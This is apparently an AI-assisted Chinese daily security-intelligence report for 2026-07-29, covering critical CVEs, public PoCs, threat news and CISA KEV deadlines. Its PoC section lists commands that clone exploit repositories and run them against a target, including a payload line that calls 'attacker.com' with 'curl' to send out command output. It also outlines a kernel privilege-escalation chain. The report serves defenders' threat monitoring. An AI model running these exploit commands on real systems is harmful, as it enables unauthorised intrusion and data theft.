每日安全情报报告 · 2026-07-29

📅 发布时间:2026/7/30 20:35:54
每日安全情报报告 · 2026-07-29
每日安全情报报告 · 2026-07-29由 AI 整理发布一、高危漏洞速报 CVE-2026-16812 — Arista VeloCloud Orchestrator 操作系统命令注入字段详情CVE 编号CVE-2026-16812CVSS 评分10.0CVSS v3.1 / v4.0 双满分漏洞类型操作系统命令注入CWE-78受影响组件Arista VeloCloud Orchestrator (VCO) On-Prem 自托管版本在野利用⚠️确认在野利用零日攻击CISA KEV2026-07-27 新增BOD 截止2026-07-30风险级别极高漏洞概述Arista VeloCloud Orchestrator 自托管版本存在一个满分 CVSS 命令注入漏洞允许远程未认证攻击者访问特权内部功能在 VCO 主机上执行任意操作系统命令。该编排器默认暴露在网络中没有任何配置可以完全消除暴露风险。成功利用可完全控制编排器及其管理的所有 SD-WAN 边缘设备。受影响版本- VCO 5.2.x 5.2.3.14- VCO 6.1.x 6.1.3.4- VCO 6.4.x 6.4.2.4- VCO 7.0.x 7.0.0.1IoCs攻击源 IP8.19.75.217、206.72.242.124、206.72.242.162参考链接- Arista 安全公告 0144- The Hacker News 报道- CISA KEV 目录 CVE-2026-63077 — JetBrains TeamCity 未认证远程代码执行字段详情CVE 编号CVE-2026-63077CVSS 评分9.8漏洞类型认证绕过 → 远程代码执行受影响组件JetBrains TeamCity On-Premises所有版本在野利用暂无确认在野利用但未认证特性使武器化可能性极高风险级别极高漏洞概述JetBrains TeamCity 本地部署版本存在严重认证绕过漏洞未认证攻击者仅需 HTTP(S) 访问即可通过agent polling 协议绕过认证检查以 TeamCity 服务器进程权限执行任意操作系统命令。TeamCity Cloud 云版本已在公告发布前修补。鉴于 TeamCity 在 CI/CD 流水线中的核心角色一旦被攻陷可能导致供应链攻击——篡改构建产物、窃取源代码和存储凭证。受影响版本TeamCity On-Premises所有版本修复版本TeamCity 2025.11.7 和 2026.1.3还修复了 20 个其他安全漏洞另提供 2017.1 版本的安全补丁插件参考链接- JetBrains 官方公告- The Hacker News 报道- TechRepublic 分析 CVE-2026-53264 — Linux 内核流量控制 UAF 本地提权AI 辅助开发字段详情CVE 编号CVE-2026-53264CVSS 评分7.8漏洞类型释放后使用UAF/ 竞态条件CWE-416受影响组件Linux 内核net/sched网络流量控制子系统PoC 状态✅ 完整 PoC 已公开STAR Labs2026-07-28 发布风险级别高漏洞概述STAR Labs 研究员 Lee Jia Jie 公开了 Linux 内核流量控制子系统中的 UAF 竞态条件漏洞利用代码可将普通本地用户提升为 root 权限。人工智能辅助了漏洞发现、KASAN PoC 生成和竞态窗口优化——优化后利用时间从 15 分钟降至 5-10 秒在 CentOS Stream 9 上 10/10 次成功。该漏洞已存在 2-3 年独立研究员 Kyle Zeng (KyleBot) 也独立发现了同一漏洞。利用条件需本地立足点 非特权用户命名空间 CONFIG_NET_ACT_GACT和CONFIG_NET_CLS_FLOWER内核选项修复版本5.10.259、5.15.210、6.1.176、6.6.143、6.12.94、6.18.36、7.0.13上游修复 2026-06-01 合入参考链接- FreeBuf 报道- 技术深度分析- NVD 详情 CVE-2026-12394 — WordPress MemberGlut 插件未认证权限提升字段详情CVE 编号CVE-2026-12394CVSS 评分9.8漏洞类型权限管理不当CWE-269受影响组件MemberGlut WordPress 插件 1.1.5风险级别高漏洞概述MemberGlut WordPress 插件前端用户注册时未验证 role 参数允许任何未认证用户在注册时指定任意角色包括管理员实现完整站点接管。PoC 计划于 2026-08-17 公开。参考链接- Wiz 漏洞分析- NVD 详情 CVE-2026-13714 — WordPress Realtyna WPL Real Estate 插件未认证文件上传字段详情CVE 编号CVE-2026-13714CVSS 评分HIGH尚未正式评分Feedly 评估为高危漏洞类型任意文件上传CWE-434 硬编码凭证受影响组件Realtyna Organic IDX WPL Real Estate WordPress 插件 5.3.0风险级别高漏洞概述该插件文件上传 API 默认启用仅由硬编码凭证保护——且该凭证在所有安装中完全相同等同于公开。攻击者可上传任意 PHP 文件如 WebShell实现远程代码执行。PoC 计划于 2026-08-03 公开。参考链接- Wiz 漏洞分析- NVD 详情 CVE-2026-15342 — Plane 项目管理平台授权绕过未修复字段详情CVE 编号CVE-2026-15342CVSS 评分严重未正式评分漏洞类型失效的访问控制CWE-862 类受影响组件Plane 开源项目管理平台≤ 1.3.0修复状态❌无官方补丁CERT/CC 无法联系供应商风险级别高漏洞概述Plane 的资产管理 API 仅依赖客户端提供的工作区标识符和资产 ID作为路径参数未验证请求者是否属于该工作区。攻击者拥有任意工作区合法账户后即可跨工作区读取、复制甚至删除其他工作区的文件直接破坏多租户隔离机制。Plane 项目方于 2026-05-28 收到通知至今未发布任何声明或修复版本。缓解措施通过 API 网关规则或防火墙限制受影响端点访问开启详细日志监控跨工作区资产请求。参考链接- 绿盟威胁情报 CVE-2025-68686 — FortiOS SSL-VPN 符号链接持久化补丁绕过字段详情CVE 编号CVE-2025-68686CVSS 评分5.9Medium漏洞类型信息泄露 / 安全补丁绕过受影响组件FortiOS SSL-VPNFortiOS 7.0/7.2/7.4/7.6/6.4在野利用⚠️确认在野利用CISA KEV 已收录风险级别中高漏洞概述攻击者可绕过此前为防止符号链接持久化机制而发布的补丁在先前已被文件系统级攻陷的设备上保留或重新获取对敏感信息的访问。CISA 已将其与 CVE-2026-16812 同期纳入 KEV 目录。修复版本FortiOS 7.6.2、7.4.77.2/7.0/6.4 需迁移至修复版本参考链接- RedLegg 安全公告- CISA KEV 目录 CISA KEV 今日截止KNX Protocol 过度限制账户锁定字段详情CVE 编号KNX Protocol Connection Authorization Option 1漏洞类型过度限制账户锁定机制CISA KEV2026-07-15 新增BOD 截止 2026-07-29今日风险级别中漏洞概述KNX 协议连接授权选项 1 中存在过度限制的账户锁定机制漏洞可能允许攻击者清除所有未启用额外安全选项的设备并设置 BCU 密钥锁定设备。参考链接- CISA KEV 目录 CVE-2026-16806 — Google Chrome WebMCP 释放后使用字段详情CVE 编号CVE-2026-16806CVSS 评分8.8High漏洞类型释放后使用UAF受影响组件Google Chrome WebMCP 150.0.7871.186风险级别中漏洞概述Chrome 150.0.7871.186 之前版本的 WebMCP 组件存在 UAF 漏洞远程攻击者可通过构造的 HTML 页面在沙箱内执行任意代码。参考链接- CVE 详情- NVD 详情二、最新漏洞 PoCPoC 1CVE-2026-53264 — Linux 内核流量控制 UAF 本地提权字段详情CVECVE-2026-53264CVSS 7.8来源STAR LabsLee Jia Jie2026-07-28 公开目标CentOS Stream 910/10 成功率9-111 秒AI 辅助✅ AI 辅助漏洞发现 KASAN PoC 竞态窗口优化使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/nicholastczn/linux-kernel-exploits.git cd linux-kernel-exploits/CVE-2026-53264 # 2. 查看依赖与目标内核要求 cat README.md # 3. 在 CentOS Stream 9 测试环境编译 # 注意ROP 链包含硬编码偏移量需针对目标内核版本调整 make # 4. 以普通用户执行 ./exploit说明该 PoC 针对特定内核版本CentOS Stream 9利用非特权用户命名空间通过RTM_NEWTFILTER/RTM_DELTFILTERnetlink 调用触发竞态通过KEYCTL_UPDATE堆喷射回收释放的kmalloc-256对象最终用 ROP 链覆写core_pattern实现 root 提权。移植到其他内核需重建 ROP 偏移。参考链接- STAR Labs 技术分析与 PoC- Linux 内核上游修复提交PoC 2CVE-2026-66012 — SiYuan MCP 未认证管理员接管字段详情CVECVE-2026-66012CVSS 10.0 Critical来源GitHub Hunt-Benito2026-07-26 公开漏洞类型缺失授权CWE-862→ 管理员接管 RCE使用步骤# 1. 克隆 PoC 仓库 git clone https://github.com/Hunt-Benito/siyuan-mcp-admin-takeover-cve-2026-66012-missing-authorization.git cd siyuan-mcp-admin-takeover-cve-2026-66012-missing-authorization # 2. 安装依赖 pip install requests # 3. 完整利用凭证窃取 插件植入 管理员提权 python3 exploit.py http://TARGET:6808 # 4. 自定义 payload python3 exploit.py http://TARGET:6808 curl http://attacker.com/$(whoami) # 5. 仅凭证窃取不植入插件 python3 exploit.py http://TARGET:6808 --no-plugin说明三个缺陷组成攻击链——MCP 端点仅用model.CheckAuth验证无管理员角色检查工具调度器不检查调用者角色Publish 反向代理在匿名模式下注入 Reader JWT。攻击者可读取conf.json提取accessAuthCode、植入恶意插件实现 RCE。参考链接- GitHub PoC 仓库- NVD 详情PoC 3CVE-2026-61511 — vBulletin 预认证远程代码执行字段详情CVECVE-2026-61511来源SSD AdvisoryBeyond Security2026-07-27 公开漏洞类型PHP 代码执行phpfuck 编码绕过 eval 过滤使用步骤# 1. 获取 PoCSSD Advisory 页面提供 # 参考: https://cloud.sec-consult.com/advisories # 2. 针对 vBulletin 6.2.1 及更早版本 # 通过构造特殊 POST 请求使用 phpfuck 编码绕过 eval() 过滤器 # 在无需认证的情况下执行 PHP 代码 # 3. 建议在隔离环境中验证 # 注意补丁已发布近一个月但大量自托管论坛仍未更新说明vBulletin 预认证 RCE利用 phpfuck 编码技术绕过 eval() 过滤器在无需任何凭证的情况下执行任意 PHP 代码。影响 vBulletin 6.2.1 及更早版本修复版本为 6.2.26。防御方应审查特定 POST 请求模式。参考链接- SSD Advisory- The Hacker News 报道- NVD 详情三、网络安全最新文章1. Arista VeloCloud Orchestrator 零日漏洞遭积极利用CISA 紧急预警摘要Arista 披露 VeloCloud Orchestrator 自托管版本存在 CVSS 10.0 操作系统命令注入零日漏洞CVE-2026-16812已被攻击者积极利用。攻击者无需认证即可通过 Web 界面执行操作系统命令完全控制编排器及所管理的边缘设备。CISA 已纳入 KEV 目录要求联邦机构 7 月 30 日前修复。Arista 已发布三个攻击源 IP 地址。阅读原文绿盟威胁情报Arista 安全公告威胁情报实验室深度分析2. JetBrains TeamCity 严重漏洞可让攻击者无需登录即执行系统命令摘要JetBrains 披露 TeamCity 本地部署版本存在 CVE-2026-63077CVSS 9.8未认证攻击者可通过 agent polling 协议绕过认证检查以服务器进程权限执行任意操作系统命令。影响所有 TeamCity On-Premises 版本TeamCity Cloud 已预先修补。鉴于 TeamCity 在 CI/CD 流水线中的核心角色攻陷可能导致供应链攻击。此前俄罗斯对外情报局曾利用 TeamCity 类似漏洞CVE-2023-42793。阅读原文The Hacker NewsJetBrains 官方公告TechRepublic 报道3. 研究人员称人工智能助力将 Linux 流量控制竞态条件利用为 Root 提权摘要STAR Labs 公开了 CVE-2026-53264CVSS 7.8的完整利用代码该漏洞是 Linux 内核网络流量控制子系统的 UAF 竞态条件。研究员 Lee Jia Jie 表示 AI 辅助了漏洞发现、KASAN PoC 生成和竞态窗口优化——利用时间从 15 分钟降至 5-10 秒在 CentOS Stream 9 上 10/10 成功。这是 AI 辅助漏洞研究的里程碑事件。独立研究员 Kyle Zeng (KyleBot) 也在 TyphoonPwn 2026 前独立发现同一漏洞。阅读原文FreeBuf技术深度分析Daily Security Review4. Operation BlueDash虚假 Teams 更新投递合法 RMM 工具建立持久访问摘要ZeroBEC 披露代号Operation BlueDash的钓鱼活动利用虚假安全文档诱饵引导用户至伪造 Microsoft Store 页面teamvem[.]com下载supportdev.exe加载器静默安装 Level RMM 和 ConnectWise ScreenConnect 两款合法远程管理工具建立冗余持久访问。攻击者随后检查系统重启状态、BitLocker、防火墙配置和本地管理员组成员。该行动归因尼日利亚威胁组织自 2026-02 起活跃另有 Zoom 主题变体投递 Tactical RMM。阅读原文The Hacker NewsGridinsoft 分析Shield53 深度分析5. Chaos 勒索组织 msaRAT 将 C2 通信隐藏在浏览器进程中摘要F5 Labs 7/29 周度威胁公告披露Chaos 勒索即服务组织使用的 Rust RATmsaRAT通过无头 Chrome/Edge 浏览器进程隐藏 C2 通信。恶意软件通过 Chrome DevTools Protocol 操控浏览器建立 WebRTC 连接路由双加密流量DTLS ChaCha20-Poly1305经 Twilio TURN 中继和 Cloudflare Worker使恶意流量与正常企业网络活动无法区分。攻击者通过update_ms.msi安装包部署归因伊朗 MuddyWater 组织。阅读原文F5 Labs 周度威胁公告6. Cl0p 勒索利用 PTC Windchill/FlexPLM CVE-2026-12569 实施仅窃密双重勒索摘要Cl0p 勒索组织利用 PTC Windchill/FlexPLM 高危漏洞 CVE-2026-12569未认证 RCE侵入受害者服务器部署 JSP WebShell 窃取产品设计、工程文档等敏感数据采用仅窃密、不加密双重勒索模式。Ransom-ISAC 已确认该漏洞活跃利用。PTC 已发布安全补丁建议相关组织立即升级并限制 Windchill 和 FlexPLM 公网暴露。阅读原文Ransom-ISAC每日安全简讯7. 勒索组织加速通过软件供应链入侵实现初始访问摘要NCC Group 最新威胁情报报告确认勒索组织正加速将软件供应链入侵作为主要初始访问向量。攻击者在可信更新机制和第三方依赖中植入恶意载荷实现跨多组织的广泛高信任访问。这一趋势要求组织重新评估所有消费软件的完整性。阅读原文Enigma Global 每日威胁摘要8. 开源项目管理平台 Plane 存在未修复授权绕过漏洞摘要开源项目管理平台 Plane 被曝存在 CVE-2026-15342 授权绕过漏洞允许攻击者跨工作区读取、复制甚至删除其他工作区的文件破坏多租户隔离。CERT/CC 无法联系供应商目前无官方补丁所有 Plane 1.3.0 及更早版本均处于风险中。企业需采取 API 网关规则、防火墙限制和详细日志监控等缓解措施。阅读原文绿盟威胁情报9. 黑客劫持酒店 Wi-Fi 窃取 Microsoft 365 账户凭证摘要ReliaQuest 文档披露自 2026-06 起的 DNS 投毒活动攻击者入侵酒店和会议中心 Wi-Fi 网关篡改 DNS 配置将企业员工 Microsoft 365 访问请求重定向至伪造登录页面窃取账户凭证。部分攻击滥用 Microsoft Device Code 认证流程绕过 MFA。手法带有 APT28 风格特征影响金融、医疗、能源等多个行业。阅读原文每日安全简讯网络安全日报10. 澳大利亚能源巨头 Origin 确认 200 万客户数据泄露摘要澳大利亚能源供应商 Origin Energy 确认数据泄露事件未经授权攻击者获取了客户姓名、出生日期、住址、电话、邮箱、账户信息及部分银行账户和支付卡信息。攻击者声称已窃取约 200 万名客户数据并实施勒索。Origin 已启动事件响应并通知受影响客户。阅读原文Origin 官方公告网络安全日报11. 印度巴罗达银行 1TB 内部文件及客户信息在暗网公开摘要安全研究员在暗网发现印度巴罗达银行 1TB 数据被免费公开包含储蓄/活期账户信息、贷款记录、网银用户资料、NRI 及企业银行记录、客户支持物料、Aadhaar 号码等关键个人标识。疑似黑客组织 TripleX 所为此前曾攻击印尼国家银行窃取 2TB 数据。研究员称此为网络灾难。阅读原文网易新闻报道12. Europol 专项行动清除 4340 个极端内容链接摘要Europol 联合西班牙 CITCO 及欧洲 9 国执法机构开展Referral Action Days专项行动针对极端网络组织The Com清除 4340 个涉嫌违法 URL。相关内容涉及宣扬自残、自杀、未成年人性虐待、暴力袭击、人肉搜索、虚假报警、爆炸物制作等违法教程。该行动是欧盟ProtectEU反恐计划的一部分。阅读原文每日安全简讯Europol 官方公告13. Oracle 2026 年 7 月关键补丁更新447 个漏洞含 10 个严重 CVE摘要Oracle 7 月关键补丁更新CPU修复 447 个漏洞包括 10 个评级为严重CVSS 9.9的 CVE。受影响产品包括 Oracle Database Server、PeopleSoft、BI Publisher、JD Edwards 和 TimesTen In-Memory Database。多个漏洞允许低权限攻击者通过网络访问实现完整系统接管。阅读原文Senthorus 周度安全回顾14. vBulletin 预认证代码执行漏洞 PoC 已公开利用摘要vBulletin 预认证 RCE 漏洞 CVE-2026-61511 的 PoC 已公开但补丁已发布近一个月。未更新的自托管论坛仍面临风险。该漏洞利用 phpfuck 编码绕过 eval 过滤在无需认证的情况下执行 PHP 代码。防御方应审查特定 POST 请求模式并督促自托管论坛管理员升级至 6.2.26。阅读原文FreeBuf 早报15. Apple 发布大规模安全更新覆盖全系产品摘要Apple 发布跨 iOS、macOS、tvOS、watchOS、visionOS 和 Safari 的广泛安全更新修复数十个漏洞。此次更新是 7 月周期的一部分建议所有 Apple 设备用户尽快安装。阅读原文Enigma Global 每日威胁摘要四、CISA KEV 状态总览日期CVE产品BOD 截止日状态2026-07-27CVE-2026-16812Arista VeloCloud Orchestrator2026-07-30⚠️ 在野利用3 天窗口2026-07-27CVE-2025-68686FortiOS SSL-VPN待确认⚠️ 在野利用2026-07-22CVE-2026-50522Microsoft SharePoint2026-07-25❌ 已逾期2026-07-22CVE-2026-16232Check Point SmartConsole2026-07-25❌ 已逾期2026-07-21CVE-2026-63030WordPress wp2shell2026-07-24❌ 已逾期2026-07-21CVE-2026-60137WordPress wp2shell2026-07-24❌ 已逾期2026-07-21CVE-2026-0770Langflow2026-07-24❌ 已逾期2026-07-21CVE-2021-27137DD-WRT2026-07-24❌ 已逾期2026-07-15KNX ProtocolKNX Association2026-07-29今日⏰ 今日截止重点提醒-CVE-2026-16812 Arista VeloCloudCVSS 10.0 零日在野利用BOD 截止 7/30仅 3 天修复窗口- 今日 KNX Protocol KEV 截止仍在 KEV 目录中的组织需立即处理- 7 项已逾期 KEV 仍未修复建议立即排查五、本期重点摘要类别数量要点严重漏洞CVSS 9.04Arista VeloCloud 10.0、TeamCity 9.8、MemberGlut 9.8、WPL Real Estate HIGH在野利用 CVE3CVE-2026-16812Arista、CVE-2025-68686FortiOS、KNX Protocol公开 PoC3Linux 内核 TC UAF、SiYuan MCP 管理员接管、vBulletin 预认证 RCECISA KEV 新增2Arista VeloCloud FortiOS SSL-VPNKEV 今日截止1KNX Protocol精选安全文章15覆盖零日利用、CI/CD 攻击面、AI 辅助漏洞研究、勒索趋势、数据泄露等核心威胁1. Arista VeloCloud CVSS 10.0 零日在野利用——SD-WAN 编排器完全失控3 天修复窗口2. JetBrains TeamCity CVSS 9.8 未认证 RCE——CI/CD 供应链攻击潜在入口3. AI 辅助 Linux 内核提权 PoC 公开——AI 加速漏洞武器化趋势里程碑4. WordPress 插件双连击——MemberGlut 管理员注册 WPL Real Estate 硬编码凭证文件上传5. Plane 未修复授权绕过——多租户隔离失效无补丁可用6. Chaos 勒索 msaRAT 浏览器隐身 C2——恶意流量伪装为正常企业活动部分内容由 AI 辅助生成